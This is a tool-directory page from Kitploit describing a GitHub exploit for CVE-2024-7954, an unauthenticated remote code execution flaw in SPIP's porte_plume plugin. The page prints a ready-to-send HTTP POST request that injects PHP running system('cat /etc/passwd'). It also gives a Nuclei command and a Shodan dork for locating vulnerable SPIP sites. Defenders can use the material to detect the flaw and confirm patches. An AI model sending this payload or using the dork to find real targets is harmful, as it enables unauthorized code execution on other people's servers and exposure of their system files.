Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
RCE_CVE-2024-7954 — Exploit for CVE-2024-7954, an unauthenticated remote code execution in SPIP's porte_plume plugin, with a Nuclei template and Shodan dork for detection. | Kitploit
Tools/GitHubGitHub/thecyberguy-17/rce_cve-2024-7954
ReconnaissanceVulnerability AnalysisExploitationWeb Application ExploitationInformation GatheringPenetration Testing
GitHubthecyberguy-17/rce_cve-2024-7954

RCE_CVE-2024-7954

Exploit for CVE-2024-7954, an unauthenticated remote code execution in SPIP's porte_plume plugin, with a Nuclei template and Shodan dork for detection.

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share
View Repository
51 year agoNot yet reviewed

RCE_CVE-2024-7954

Description:

The porte_plume plugin used by SPIP before 4.30-alpha2, 4.2.13, and 4.1.16 is vulnerable to an arbitrary code execution vulnerability. A remote and unauthenticated attacker can execute arbitrary PHP as the SPIP user by sending a crafted HTTP request. (CRITICAL)

Exploit:

POST /index.php?action=porte_plume_previsu HTTP/1.1

Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded

data=AA_[->URL<?php system('cat /etc/passwd'); ?>]_BB

Used Tool:

Nuclei -l(target file) -t(Templates) CVE-2024-7954.yml

Shodan Dork:

app="SPIP"

Reference:

1) https://github.com/fa-rrel
Download Tool